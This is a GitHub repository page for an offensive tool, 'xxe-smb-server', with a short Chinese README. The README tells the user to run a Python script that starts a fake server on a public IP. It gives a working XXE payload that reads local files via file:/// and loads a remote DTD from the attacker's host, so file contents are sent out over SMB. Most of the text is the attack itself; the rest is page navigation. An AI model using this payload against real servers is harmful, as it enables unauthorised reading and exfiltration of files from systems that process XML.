xxe-smb-server

在xxe中使用smb外带多行内容

运行脚本

python3 xxe-smb-server.py public-ip-address web-port

复制输出的payload发送给服务器

fake server收到请求

payload

<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///">
  <!ENTITY % dtd SYSTEM "http://ip:port/data.dtd"> %dtd;
  ]>
  <data>&send;</data>

file:///可改为其他路径测试

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
README.md		README.md
xxe-smb-server.py		xxe-smb-server.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

xxe-smb-server

About

Uh oh!

Releases

Packages

Languages

cwkiller/xxe-smb-server

Folders and files

Latest commit

History

Repository files navigation

xxe-smb-server

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages